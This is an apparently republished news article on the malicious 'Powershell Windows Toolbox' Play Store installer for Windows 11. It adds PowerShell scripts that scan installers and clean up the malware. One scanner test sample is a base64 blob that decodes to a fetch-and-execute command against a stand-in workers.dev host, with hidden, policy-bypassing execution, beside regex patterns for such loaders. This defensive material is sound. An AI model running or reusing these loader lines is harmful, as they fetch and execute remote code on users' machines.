A third-party tool used to install the Google Play Store on Windows 11 has been found to be malicious. One of Neowin's readers, Eli, appears to have fallen victim to it after using it to install the Play Store.
The tool, called "Powershell Windows Toolbox," was hosted on GitHub. User LinuxUserGD noticed that the underlying code was suspicious and contained malicious code, and user SuchByte later opened an issue about it. The Powershell Windows Toolbox has since been removed from GitHub.
Here’s everything the tool claims to do:
First, the tool uses a Cloudflare Worker to load its script. In the "How to use" section, the developers instruct users to run the following command in a command-line shell:
While the loaded script does perform the advertised functions, it was also found to contain obfuscated code. Deobfuscating it revealed PowerShell that loaded further malicious scripts from Cloudflare Workers and files from the GitHub repository of user alexrybak0444, who may be the threat actor or one of them. These were also reported and removed (archived version here).
The script then creates a Chromium extension, which is believed to be the main malicious component of the campaign. The payload appears to be a set of links or URLs that earn revenue through affiliate and referral programs by promoting particular software or a money-making scheme, distributed through Facebook and WhatsApp messages.
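The pattern described above (an installer fetched from a Cloudflare Worker that hides a second stage behind obfuscation and a download cradle) is exactly what a user piping a remote script into Invoke-Expression never gets to see. The following is an added example, not code from the article or from the toolbox: it saves a remote installer script instead of executing it, records its hash, and flags the obfuscation and loader markers that a reviewer should read by hand first. The regexes, the function names and the sample script are this example's own constructions; the real toolbox script is not reproduced.

```powershell
# Added example; not the toolbox's code and not from the article.
# Save a remote install script, hash it, and flag loader/obfuscation markers
# instead of running it blind with "iwr ... | iex".

function Get-ScriptIndicators {
    param([Parameter(Mandatory)][string]$ScriptText)

    # Label => regex. Deliberately broad: every hit is something to read before
    # the script is trusted, not an automatic verdict.
    $patterns = [ordered]@{
        'Download cradle (iwr/irm, WebClient, DownloadString)' = '(?i)(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient|DownloadString|DownloadFile)'
        'Invoke-Expression / iex'                               = '(?i)(Invoke-Expression|\biex\b)'
        'Encoded command switch'                                = '(?i)-(e|ec|enc|encodedcommand)\b'
        'Base64 decode'                                         = '(?i)FromBase64String'
        'Long base64-looking literal (>= 64 chars)'             = '[A-Za-z0-9+/]{64,}={0,2}'
        'Char-code assembly ([char]N)'                          = '(?i)\[char\]\s*\d+'
        'Hosts: workers.dev or GitHub content'                  = '(?i)(workers\.dev|raw\.githubusercontent\.com|github\.com/[^/\s"'']+/[^/\s"'']+)'
        'Hidden window / execution-policy bypass'               = '(?i)-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass'
    }

    foreach ($label in $patterns.Keys) {
        $hits = [regex]::Matches($ScriptText, $patterns[$label])
        if ($hits.Count -gt 0) {
            $first = $hits[0].Value
            [pscustomobject]@{
                Indicator = $label
                Count     = $hits.Count
                Sample    = $first.Substring(0, [Math]::Min(60, $first.Length))
            }
        }
    }
}

function Test-RemoteInstallScript {
    param(
        [Parameter(Mandatory)][string]$Url,
        [string]$SavePath = (Join-Path $env:TEMP 'untrusted-installer.ps1')   # assumed location
    )
    # Save rather than execute. The SHA-256 is what you compare against the
    # repository copy and what you quote when reporting a hostile script.
    Invoke-WebRequest -Uri $Url -OutFile $SavePath -UseBasicParsing
    $hash = (Get-FileHash -Path $SavePath -Algorithm SHA256).Hash
    Write-Host "Saved to $SavePath  SHA256=$hash"
    Get-ScriptIndicators -ScriptText (Get-Content -Raw -Path $SavePath)
}

# Constructed sample standing in for a fetched installer: a friendly message
# wrapped around a base64 blob that is decoded and executed, plus a hidden,
# policy-bypassing child process. The URL and blob are made up for this example.
$sample = @'
Write-Host "Installing Play Store..."
$u = "https://example-loader.workers.dev/stage2"
$b = "aWV4IChpd3IgaHR0cHM6Ly9leGFtcGxlLndvcmtlcnMuZGV2L3N0YWdlMykuQ29udGVudA=="
iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b)))
powershell -w hidden -ep bypass -enc $b
'@

Get-ScriptIndicators -ScriptText $sample | Format-Table -AutoSize
# Real use: Test-RemoteInstallScript -Url '<the URL from the tool''s README>'
```

On the constructed sample every category except char-code assembly fires. A hit on the base64 or encoded-command lines is the cue to decode the blob offline (for example with [Convert]::FromBase64String into a file) and repeat the scan on the result, since a second stage that is itself a loader is what the deobfuscation described above uncovered.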
If you have the Powershell Windows Toolbox installed on your system, remove the following scheduled tasks created by the tool during infection (listed as Task Scheduler library paths, as reported):
- Microsoft\Windows\AppID\VerifiedCert
- Microsoft\Windows\Application Experience\Maintenance
- Microsoft\Windows\Services\CertPathCheck
- Microsoft\Windows\Services\CertPathw
- Microsoft\Windows\Serviceing\ComponentCleanup
- Microsoft\Windows\Service\Service Cleanup
- Microsoft\Windows\Shell\ObjectTask
- Microsoft\Windows\Clip\ServiceCleanup
Also delete the hidden folder "C:\systemfile" created by the malicious script during infection. If you are performing a system restore, make sure to use a restore point that was not created by the Powershell Windows Toolbox itself, as restoring to one of its own points will not remove the malware from the system.
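The cleanup steps above, as an added example script rather than the article's own instructions or the toolbox's code. It checks for each listed scheduled task and for the hidden folder, records what each task actually runs (the command line is what distinguishes the implant from a legitimately named task), and only deletes with -Remove, after exporting the task XML and zipping the folder so the artefacts survive for analysis. The -Remove switch, the evidence directory and the browser-policy check at the end are this example's assumptions; the task paths are copied from the list above exactly as printed. Run it from an elevated PowerShell prompt.

```powershell
# Added example; not the article's instructions as code and not the toolbox's code.
# Lists the indicators named in the article and removes them only with -Remove.
[CmdletBinding()]
param(
    [switch]$Remove,
    [string]$EvidenceDir = (Join-Path $env:ProgramData 'pwt-evidence')   # assumed location
)

# Task Scheduler library paths from the article, as printed ("Folder\Sub\TaskName").
$TaskPaths = @(
    'Microsoft\Windows\AppID\VerifiedCert',
    'Microsoft\Windows\Application Experience\Maintenance',
    'Microsoft\Windows\Services\CertPathCheck',
    'Microsoft\Windows\Services\CertPathw',
    'Microsoft\Windows\Serviceing\ComponentCleanup',
    'Microsoft\Windows\Service\Service Cleanup',
    'Microsoft\Windows\Shell\ObjectTask',
    'Microsoft\Windows\Clip\ServiceCleanup'
)
$HiddenFolder = 'C:\systemfile'

$findings = New-Object System.Collections.Generic.List[object]

foreach ($entry in $TaskPaths) {
    # Get-ScheduledTask wants the folder with leading and trailing backslash
    # and the task name separately.
    $i      = $entry.LastIndexOf('\')
    $folder = '\' + $entry.Substring(0, $i) + '\'
    $name   = $entry.Substring($i + 1)
    $task   = Get-ScheduledTask -TaskPath $folder -TaskName $name -ErrorAction SilentlyContinue
    if (-not $task) { continue }

    # Capture the action before touching the task: this is the evidence.
    $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join ' ; '
    $findings.Add([pscustomobject]@{ Type = 'ScheduledTask'; Path = $entry; Detail = $actions })

    if ($Remove) {
        New-Item -ItemType Directory -Path $EvidenceDir -Force | Out-Null
        Export-ScheduledTask -TaskPath $folder -TaskName $name |
            Set-Content -Path (Join-Path $EvidenceDir "$name.xml")
        Unregister-ScheduledTask -TaskPath $folder -TaskName $name -Confirm:$false
    }
}

if (Test-Path -LiteralPath $HiddenFolder) {
    $files = @(Get-ChildItem -LiteralPath $HiddenFolder -Recurse -Force -File -ErrorAction SilentlyContinue)
    $findings.Add([pscustomobject]@{ Type = 'Folder'; Path = $HiddenFolder; Detail = "$($files.Count) file(s)" })
    if ($Remove) {
        New-Item -ItemType Directory -Path $EvidenceDir -Force | Out-Null
        # Archive the dropped files before deleting so they can still be analysed.
        Compress-Archive -LiteralPath $HiddenFolder -DestinationPath (Join-Path $EvidenceDir 'systemfile.zip') -Force
        Remove-Item -LiteralPath $HiddenFolder -Recurse -Force
    }
}

# The article says a Chromium extension is the main payload but not how it is
# installed. Assumption for this check: a sideloaded extension is often kept
# in place through the ExtensionInstallForcelist policy, so list those entries
# for manual review. The toolbox may well use a different mechanism.
$policyKeys = @(
    'HKLM:\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist',
    'HKCU:\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist',
    'HKLM:\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist',
    'HKCU:\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist'
)
foreach ($key in $policyKeys) {
    if (-not (Test-Path $key)) { continue }
    (Get-ItemProperty -Path $key).PSObject.Properties |
        Where-Object { $_.Name -match '^\d+$' } |
        ForEach-Object { $findings.Add([pscustomobject]@{ Type = 'ForcedExtension'; Path = $key; Detail = $_.Value }) }
}

if ($findings.Count -eq 0) { Write-Host 'None of the listed indicators are present.' }
else { $findings | Format-Table -AutoSize -Wrap }
```

Run it once without -Remove and read the Detail column first: a task whose action is powershell.exe with a hidden window, an encoded command or a URL is the implant; a task with the same name but a stock Windows action may be a coincidence and deserves a second look before it is unregistered. Because the article warns that the toolbox creates its own restore points, do this cleanup (or a restore to an earlier, independent point) rather than relying on System Restore alone.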
Source: "Powershell Windows Toolbox that helps install Google Play on Windows 11 is malware", republished on the PHP Chinese website.